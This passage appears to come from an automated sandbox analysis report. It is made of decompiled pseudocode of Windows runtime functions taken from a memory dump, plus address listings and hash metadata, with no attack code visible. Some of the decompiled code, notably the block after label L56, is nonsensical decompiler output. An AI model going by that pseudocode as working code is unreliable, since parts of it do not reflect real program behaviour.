					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E00ACB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E00B58A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E00AB9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0xb7b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                                                                                    0x00aa0055
                                                                                                    0x00aa005d
                                                                                                    0x00aa0062
                                                                                                    0x00aa006c
                                                                                                    0x00aa006f
                                                                                                    0x00aa0074
                                                                                                    0x00aa007a
                                                                                                    0x00aa007a
                                                                                                    0x00aa0080
                                                                                                    0x00aa0080
                                                                                                    0x00aa0087
                                                                                                    0x00aa008d
                                                                                                    0x00aa008f
                                                                                                    0x00aa0093
                                                                                                    0x00aa0095
                                                                                                    0x00aa009b
                                                                                                    0x00aa00f8
                                                                                                    0x00aa00fb
                                                                                                    0x00aa00fc
                                                                                                    0x00aa00ff
                                                                                                    0x00aa0108
                                                                                                    0x00aa0108
                                                                                                    0x00aa00a2
                                                                                                    0x00aa00a6
                                                                                                    0x00aa00b3
                                                                                                    0x00aa00bc
                                                                                                    0x00aa00c5
                                                                                                    0x00aa00ca
                                                                                                    0x00aec01e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aec02d
                                                                                                    0x00aa00d5
                                                                                                    0x00aa00d9
                                                                                                    0x00aec03d
                                                                                                    0x00aec046
                                                                                                    0x00aec046
                                                                                                    0x00aa00df
                                                                                                    0x00aa00e2
                                                                                                    0x00aa00ea
                                                                                                    0x00aa00ef
                                                                                                    0x00aa00f2
                                                                                                    0x00aa00f6
                                                                                                    0x00aa0111
                                                                                                    0x00aa0117
                                                                                                    0x00aa0117
                                                                                                    0x00000000
                                                                                                    0x00aa00f6
                                                                                                    0x00aa00d0
                                                                                                    0x00aa00d0
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: DebugPrintTimes
                                                                                                    • String ID:
                                                                                                    • API String ID: 3446177414-0
                                                                                                    • Opcode ID: b5acd78a19a11433ef21153858aad88c7b803125559743536415899c3c4cc2c3
                                                                                                    • Instruction ID: 0435256e1dcd9076d9a52dc4a24b3f7719e4f97ea3f58587231f054ac43c1a5c
                                                                                                    • Opcode Fuzzy Hash: b5acd78a19a11433ef21153858aad88c7b803125559743536415899c3c4cc2c3
                                                                                                    • Instruction Fuzzy Hash: 33318931611B04CFD722CF28C941F9AB3E5FF89714F24456DE59A87AA0EB35AC02CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AB2581, Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 81%
                                                                                                    			E00AB2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a35, char _a1530200231, char _a1546911911) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t243;
				signed int _t247;
				void* _t248;
				signed int _t253;
				signed int _t255;
				intOrPtr _t257;
				signed int _t260;
				signed int _t267;
				signed int _t270;
				signed int _t278;
				intOrPtr _t284;
				signed int _t286;
				signed int _t288;
				void* _t289;
				void* _t290;
				signed int _t291;
				unsigned int _t294;
				signed int _t298;
				void* _t299;
				signed int _t300;
				signed int _t304;
				intOrPtr _t317;
				signed int _t326;
				signed int _t328;
				signed int _t329;
				signed int _t333;
				signed int _t334;
				signed int _t336;
				signed int _t338;
				signed int _t340;
				void* _t341;

				_t338 = _t340;
				_t341 = _t340 - 0x4c;
				_v8 =  *0xb7d360 ^ _t338;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t333 = 0xb7b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t294 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t284 = 0x48;
				_t314 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t326 = 0;
				_v37 = _t314;
				if(_v48 <= 0) {
					L16:
					_t45 = _t284 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t334 = 0xc0000106;
						goto L32;
					} else {
						_t333 = L00AA4620(_t294,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t284);
						_v52 = _t333;
						__eflags = _t333;
						if(_t333 == 0) {
							_t334 = 0xc0000017;
							goto L32;
						} else {
							 *(_t333 + 0x44) =  *(_t333 + 0x44) & 0x00000000;
							_t50 = _t333 + 0x48; // 0x48
							_t328 = _t50;
							_t314 = _v32;
							 *((intOrPtr*)(_t333 + 0x3c)) = _t284;
							_t286 = 0;
							 *((short*)(_t333 + 0x30)) = _v48;
							__eflags = _t314;
							if(_t314 != 0) {
								 *(_t333 + 0x18) = _t328;
								__eflags = _t314 - 0xb78478;
								 *_t333 = ((0 | _t314 == 0x00b78478) - 0x00000001 & 0xfffffffb) + 7;
								E00ACF3E0(_t328,  *((intOrPtr*)(_t314 + 4)),  *_t314 & 0x0000ffff);
								_t314 = _v32;
								_t341 = _t341 + 0xc;
								_t286 = 1;
								__eflags = _a8;
								_t328 = _t328 + (( *_t314 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t278 = E00B139F2(_t328);
									_t314 = _v32;
									_t328 = _t278;
								}
							}
							_t298 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t334 = _v68;
								__eflags = 0;
								 *((short*)(_t328 - 2)) = 0;
								goto L32;
							} else {
								_t288 = _t333 + _t286 * 4;
								_v56 = _t288;
								do {
									__eflags = _t314;
									if(_t314 != 0) {
										_t243 =  *(_v60 + _t298 * 4);
										__eflags = _t243;
										if(_t243 == 0) {
											goto L30;
										} else {
											__eflags = _t243 == 5;
											if(_t243 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t288 =  *(_v60 + _t298 * 4);
										 *(_t288 + 0x18) = _t328;
										_t247 =  *(_v60 + _t298 * 4);
										__eflags = _t247 - 8;
										if(_t247 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t247 * 4 +  &M00AB2959))) {
												case 0:
													__ax =  *0xb78488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E00ACF3E0(__edi,  *0xb7848c, __ax & 0x0000ffff);
														__eax =  *0xb78488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E00ACF3E0(_t328, _v80, _v64);
													_t273 = _v64;
													goto L26;
												case 2:
													 *0xb78480 & 0x0000ffff = E00ACF3E0(__edi,  *0xb78484,  *0xb78480 & 0x0000ffff);
													__eax =  *0xb78480 & 0x0000ffff;
													__eax = ( *0xb78480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E00ACF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E00ACF3E0(_t328, _v76, _v36);
														_t273 = _v36;
													}
													L26:
													_t341 = _t341 + 0xc;
													_t328 = _t328 + (_t273 >> 1) * 2 + 2;
													__eflags = _t328;
													L27:
													_push(0x3b);
													_pop(_t275);
													 *((short*)(_t328 - 2)) = _t275;
													goto L28;
												case 6:
													__ebx =  *0xb7575c;
													__eflags = __ebx - 0xb7575c;
													if(__ebx != 0xb7575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E00ACF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0xb7575c;
														} while (__ebx != 0xb7575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0xb78478 & 0x0000ffff = E00ACF3E0(__edi,  *0xb7847c,  *0xb78478 & 0x0000ffff);
													__eax =  *0xb78478 & 0x0000ffff;
													__eax = ( *0xb78478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E00B139F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0xb76e58 & 0x0000ffff = E00ACF3E0(__edi,  *0xb76e5c,  *0xb76e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0xb76e58 & 0x0000ffff;
													__eax = ( *0xb76e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t298 = _v16;
													_t314 = _v32;
													L29:
													_t288 = _t288 + 4;
													__eflags = _t288;
													_v56 = _t288;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t298 = _t298 + 1;
									_v16 = _t298;
									__eflags = _t298 - _v48;
								} while (_t298 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t247 =  *(_v60 + _t326 * 4);
						if(_t247 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t247 * 4 +  &M00AB2935))) {
							case 0:
								__ax =  *0xb78488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t314 =  &_v64;
								_v80 = E00AB2E3E(0,  &_v64);
								_t284 = _t284 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0xb78480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0xb78480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E00A9EEF0(0xb779a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E00A9EB70(__ecx, 0xb779a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t221 = _v72;
											__eflags = _t221;
											if(_t221 != 0) {
												L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t221);
											}
											_t222 = _v52;
											__eflags = _t222;
											if(_t222 != 0) {
												__eflags = _t334;
												if(_t334 < 0) {
													L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t222);
													_t222 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t294 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0xb77b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L00AA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E00A9EB70(__ecx, 0xb779a0);
										__eax = _v52;
										L36:
										_pop(_t327);
										_pop(_t335);
										__eflags = _v8 ^ _t338;
										_pop(_t285);
										return E00ACB640(_t222, _t285, _v8 ^ _t338, _t314, _t327, _t335);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t280 = _v56;
								if(_v56 != 0) {
									_t314 =  &_v36;
									_t282 = E00AB2E3E(_t280,  &_v36);
									_t294 = _v36;
									_v76 = _t282;
								}
								if(_t294 == 0) {
									goto L44;
								} else {
									_t284 = _t284 + 2 + _t294;
								}
								goto L14;
							case 6:
								__eax =  *0xb75764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0xb78478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0xb78478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0xb76e58 & 0x0000ffff;
								__eax = ( *0xb76e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t326 = _t326 + 1;
								if(_t326 >= _v48) {
									goto L16;
								} else {
									_t314 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t299 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("stosd");
					 *((intOrPtr*)(_t333 + 0x28)) =  *((intOrPtr*)(_t333 + 0x28)) + _t247;
					asm("stosd");
					_t248 = _t247 + _t247;
					asm("daa");
					asm("stosd");
					 *_t333 =  *_t333 + _t299;
					asm("es stosd");
					 *((intOrPtr*)(_t333 + 0x28)) =  *((intOrPtr*)(_t333 + 0x28)) + _t248;
					asm("stosd");
					 *0x1f00ab26 =  *0x1f00ab26 + _t248;
					_pop(_t289);
					asm("scasd");
					 *((intOrPtr*)(_t248 +  &_a1530200231)) =  *((intOrPtr*)(_t248 +  &_a1530200231)) + _t314;
					asm("scasd");
					 *_t314 =  *_t314 + _t248;
					 *((intOrPtr*)(_t289 - 0x54d78000)) =  *((intOrPtr*)(_t289 - 0x54d78000)) - _t338;
					asm("daa");
					asm("stosd");
					 *_t333 =  *_t333 + _t289;
					 *((intOrPtr*)(_t289 - 0x54d7b200)) =  *((intOrPtr*)(_t289 - 0x54d7b200)) - _t299;
					_a35 = _a35 + _t289;
					asm("stosd");
					_pop(_t290);
					asm("scasd");
					 *((intOrPtr*)(_t248 + _t289 +  &_a1546911911)) =  *((intOrPtr*)(_t248 + _t289 +  &_a1546911911)) + _t314 + _t314;
					asm("scasd");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0xb5ff00);
					E00ADD08C(_t290, _t328, _t333);
					_v44 =  *[fs:0x18];
					_t329 = 0;
					 *_a24 = 0;
					_t291 = _a12;
					__eflags = _t291;
					if(_t291 == 0) {
						_t253 = 0xc0000100;
					} else {
						_v8 = 0;
						_t336 = 0xc0000100;
						_v52 = 0xc0000100;
						_t255 = 4;
						while(1) {
							_v40 = _t255;
							__eflags = _t255;
							if(_t255 == 0) {
								break;
							}
							_t304 = _t255 * 0xc;
							_v48 = _t304;
							__eflags = _t291 -  *((intOrPtr*)(_t304 + 0xa61664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t270 = E00ACE5C0(_a8,  *((intOrPtr*)(_t304 + 0xa61668)), _t291);
									_t341 = _t341 + 0xc;
									__eflags = _t270;
									if(__eflags == 0) {
										_t336 = E00B051BE(_t291,  *((intOrPtr*)(_v48 + 0xa6166c)), _a16, _t329, _t336, __eflags, _a20, _a24);
										_v52 = _t336;
										break;
									} else {
										_t255 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t255 = _t255 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t336;
						__eflags = _t336;
						if(_t336 < 0) {
							__eflags = _t336 - 0xc0000100;
							if(_t336 == 0xc0000100) {
								_t300 = _a4;
								__eflags = _t300;
								if(_t300 != 0) {
									_v36 = _t300;
									__eflags =  *_t300 - _t329;
									if( *_t300 == _t329) {
										_t336 = 0xc0000100;
										goto L76;
									} else {
										_t317 =  *((intOrPtr*)(_v44 + 0x30));
										_t257 =  *((intOrPtr*)(_t317 + 0x10));
										__eflags =  *((intOrPtr*)(_t257 + 0x48)) - _t300;
										if( *((intOrPtr*)(_t257 + 0x48)) == _t300) {
											__eflags =  *(_t317 + 0x1c);
											if( *(_t317 + 0x1c) == 0) {
												L106:
												_t336 = E00AB2AE4( &_v36, _a8, _t291, _a16, _a20, _a24);
												_v32 = _t336;
												__eflags = _t336 - 0xc0000100;
												if(_t336 != 0xc0000100) {
													goto L69;
												} else {
													_t329 = 1;
													_t300 = _v36;
													goto L75;
												}
											} else {
												_t260 = E00A96600( *(_t317 + 0x1c));
												__eflags = _t260;
												if(_t260 != 0) {
													goto L106;
												} else {
													_t300 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t336 = E00AB2C50(_t300, _a8, _t291, _a16, _a20, _a24, _t329);
											L76:
											_v32 = _t336;
											goto L69;
										}
									}
									goto L108;
								} else {
									E00A9EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t336 = _a24;
									_t267 = E00AB2AE4( &_v36, _a8, _t291, _a16, _a20, _t336);
									_v32 = _t267;
									__eflags = _t267 - 0xc0000100;
									if(_t267 == 0xc0000100) {
										_v32 = E00AB2C50(_v36, _a8, _t291, _a16, _a20, _t336, 1);
									}
									_v8 = _t329;
									E00AB2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t253 = _t336;
					}
					L70:
					return E00ADD0D1(_t253);
				}
				L108:
			}




















































                                                                                                    0x00ab2584
                                                                                                    0x00ab2586
                                                                                                    0x00ab2590
                                                                                                    0x00ab2596
                                                                                                    0x00ab2597
                                                                                                    0x00ab2598
                                                                                                    0x00ab2599
                                                                                                    0x00ab259e
                                                                                                    0x00ab25a4
                                                                                                    0x00ab25a9
                                                                                                    0x00ab25ac
                                                                                                    0x00ab25ae
                                                                                                    0x00ab25b1
                                                                                                    0x00ab25b2
                                                                                                    0x00ab25b5
                                                                                                    0x00ab25b8
                                                                                                    0x00ab25bb
                                                                                                    0x00ab25bc
                                                                                                    0x00ab25bf
                                                                                                    0x00ab25c2
                                                                                                    0x00ab25c5
                                                                                                    0x00ab25c6
                                                                                                    0x00ab25cb
                                                                                                    0x00ab25ce
                                                                                                    0x00ab25d8
                                                                                                    0x00ab25dd
                                                                                                    0x00ab25de
                                                                                                    0x00ab25e1
                                                                                                    0x00ab25e3
                                                                                                    0x00ab25e9
                                                                                                    0x00ab26da
                                                                                                    0x00ab26da
                                                                                                    0x00ab26dd
                                                                                                    0x00ab26e2
                                                                                                    0x00af5b56
                                                                                                    0x00000000
                                                                                                    0x00ab26e8
                                                                                                    0x00ab26f9
                                                                                                    0x00ab26fb
                                                                                                    0x00ab26fe
                                                                                                    0x00ab2700
                                                                                                    0x00af5b60
                                                                                                    0x00000000
                                                                                                    0x00ab2706
                                                                                                    0x00ab2706
                                                                                                    0x00ab270a
                                                                                                    0x00ab270a
                                                                                                    0x00ab270d
                                                                                                    0x00ab2713
                                                                                                    0x00ab2716
                                                                                                    0x00ab2718
                                                                                                    0x00ab271c
                                                                                                    0x00ab271e
                                                                                                    0x00af5b6c
                                                                                                    0x00af5b6f
                                                                                                    0x00af5b7f
                                                                                                    0x00af5b89
                                                                                                    0x00af5b8e
                                                                                                    0x00af5b93
                                                                                                    0x00af5b96
                                                                                                    0x00af5b9c
                                                                                                    0x00af5ba0
                                                                                                    0x00af5ba3
                                                                                                    0x00af5bab
                                                                                                    0x00af5bb0
                                                                                                    0x00af5bb3
                                                                                                    0x00af5bb3
                                                                                                    0x00af5ba3
                                                                                                    0x00ab2724
                                                                                                    0x00ab2726
                                                                                                    0x00ab2729
                                                                                                    0x00ab272c
                                                                                                    0x00ab279d
                                                                                                    0x00ab279d
                                                                                                    0x00ab27a0
                                                                                                    0x00ab27a2
                                                                                                    0x00000000
                                                                                                    0x00ab272e
                                                                                                    0x00ab272e
                                                                                                    0x00ab2731
                                                                                                    0x00ab2734
                                                                                                    0x00ab2734
                                                                                                    0x00ab2736
                                                                                                    0x00af5bc1
                                                                                                    0x00af5bc1
                                                                                                    0x00af5bc4
                                                                                                    0x00000000
                                                                                                    0x00af5bca
                                                                                                    0x00af5bca
                                                                                                    0x00af5bcd
                                                                                                    0x00000000
                                                                                                    0x00af5bd3
                                                                                                    0x00000000
                                                                                                    0x00af5bd3
                                                                                                    0x00af5bcd
                                                                                                    0x00ab273c
                                                                                                    0x00ab273c
                                                                                                    0x00ab2742
                                                                                                    0x00ab2747
                                                                                                    0x00ab274a
                                                                                                    0x00ab274d
                                                                                                    0x00ab2750
                                                                                                    0x00000000
                                                                                                    0x00ab2756
                                                                                                    0x00ab2756
                                                                                                    0x00000000
                                                                                                    0x00ab2902
                                                                                                    0x00ab2908
                                                                                                    0x00ab290b
                                                                                                    0x00000000
                                                                                                    0x00ab2911
                                                                                                    0x00ab291c
                                                                                                    0x00ab2921
                                                                                                    0x00000000
                                                                                                    0x00ab2921
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00ab2880
                                                                                                    0x00ab2887
                                                                                                    0x00ab288c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00ab2805
                                                                                                    0x00ab280a
                                                                                                    0x00ab2814
                                                                                                    0x00ab2816
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00ab281e
                                                                                                    0x00ab2821
                                                                                                    0x00ab2823
                                                                                                    0x00000000
                                                                                                    0x00ab2829
                                                                                                    0x00ab2829
                                                                                                    0x00ab2831
                                                                                                    0x00ab283c
                                                                                                    0x00ab283e
                                                                                                    0x00000000
                                                                                                    0x00ab283e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00ab284e
                                                                                                    0x00ab2850
                                                                                                    0x00ab2851
                                                                                                    0x00ab2854
                                                                                                    0x00ab2857
                                                                                                    0x00ab285a
                                                                                                    0x00ab285c
                                                                                                    0x00ab285d
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00ab275d
                                                                                                    0x00ab2761
                                                                                                    0x00000000
                                                                                                    0x00ab2767
                                                                                                    0x00ab276e
                                                                                                    0x00ab2773
                                                                                                    0x00ab2773
                                                                                                    0x00ab2776
                                                                                                    0x00ab2778
                                                                                                    0x00ab277e
                                                                                                    0x00ab277e
                                                                                                    0x00ab2781
                                                                                                    0x00ab2781
                                                                                                    0x00ab2783
                                                                                                    0x00ab2784
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00af5bd8
                                                                                                    0x00af5bde
                                                                                                    0x00af5be4
                                                                                                    0x00af5be6
                                                                                                    0x00af5be8
                                                                                                    0x00af5be9
                                                                                                    0x00af5bee
                                                                                                    0x00af5bf8
                                                                                                    0x00af5bff
                                                                                                    0x00af5c01
                                                                                                    0x00af5c04
                                                                                                    0x00af5c07
                                                                                                    0x00af5c0b
                                                                                                    0x00af5c0d
                                                                                                    0x00af5c0d
                                                                                                    0x00af5c15
                                                                                                    0x00af5c18
                                                                                                    0x00af5c1b
                                                                                                    0x00af5c1b
                                                                                                    0x00af5c1e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00ab28c3
                                                                                                    0x00ab28c8
                                                                                                    0x00ab28d2
                                                                                                    0x00ab28d4
                                                                                                    0x00ab28d8
                                                                                                    0x00ab28db
                                                                                                    0x00af5c26
                                                                                                    0x00af5c28
                                                                                                    0x00af5c2d
                                                                                                    0x00af5c2d
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00af5c34
                                                                                                    0x00af5c36
                                                                                                    0x00af5c49
                                                                                                    0x00af5c4e
                                                                                                    0x00af5c54
                                                                                                    0x00af5c5b
                                                                                                    0x00af5c5d
                                                                                                    0x00af5c60
                                                                                                    0x00ab2788
                                                                                                    0x00ab2788
                                                                                                    0x00ab278b
                                                                                                    0x00ab278e
                                                                                                    0x00ab278e
                                                                                                    0x00ab278e
                                                                                                    0x00ab2791
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00ab2756
                                                                                                    0x00ab2750
                                                                                                    0x00000000
                                                                                                    0x00ab2794
                                                                                                    0x00ab2794
                                                                                                    0x00ab2795
                                                                                                    0x00ab2798
                                                                                                    0x00ab2798
                                                                                                    0x00000000
                                                                                                    0x00ab2734
                                                                                                    0x00ab272c
                                                                                                    0x00ab2700
                                                                                                    0x00ab25ef
                                                                                                    0x00ab25ef
                                                                                                    0x00ab25ef
                                                                                                    0x00ab25f2
                                                                                                    0x00ab25f8
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00ab25fe
                                                                                                    0x00000000
                                                                                                    0x00ab28e6
                                                                                                    0x00ab28ec
                                                                                                    0x00ab28ef
                                                                                                    0x00ab28f5
                                                                                                    0x00ab28f8
                                                                                                    0x00ab28f8
                                                                                                    0x00000000
                                                                                                    0x00ab28f8
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00ab2866
                                                                                                    0x00ab2866
                                                                                                    0x00ab2876
                                                                                                    0x00ab2879
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00ab27e0
                                                                                                    0x00ab27e7
                                                                                                    0x00ab27e9
                                                                                                    0x00ab27eb
                                                                                                    0x00af5afd
                                                                                                    0x00000000
                                                                                                    0x00af5afd
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00ab2633
                                                                                                    0x00ab2638
                                                                                                    0x00ab263b
                                                                                                    0x00ab263c
                                                                                                    0x00ab263e
                                                                                                    0x00ab2640
                                                                                                    0x00ab2642
                                                                                                    0x00ab2647
                                                                                                    0x00ab2649
                                                                                                    0x00ab264e
                                                                                                    0x00ab2650
                                                                                                    0x00ab2653
                                                                                                    0x00ab2659
                                                                                                    0x00ab26a2
                                                                                                    0x00ab26a7
                                                                                                    0x00ab26ac
                                                                                                    0x00ab26b2
                                                                                                    0x00af5b11
                                                                                                    0x00af5b15
                                                                                                    0x00af5b17
                                                                                                    0x00000000
                                                                                                    0x00ab26b8
                                                                                                    0x00ab26b8
                                                                                                    0x00ab26ba
                                                                                                    0x00ab27a6
                                                                                                    0x00ab27a6
                                                                                                    0x00ab27a9
                                                                                                    0x00ab27ab
                                                                                                    0x00ab27b9
                                                                                                    0x00ab27b9
                                                                                                    0x00ab27be
                                                                                                    0x00ab27c1
                                                                                                    0x00ab27c3
                                                                                                    0x00ab27c5
                                                                                                    0x00ab27c7
                                                                                                    0x00af5c74
                                                                                                    0x00af5c79
                                                                                                    0x00af5c79
                                                                                                    0x00ab27c7
                                                                                                    0x00000000
                                                                                                    0x00ab26c0
                                                                                                    0x00ab26c0
                                                                                                    0x00ab26c3
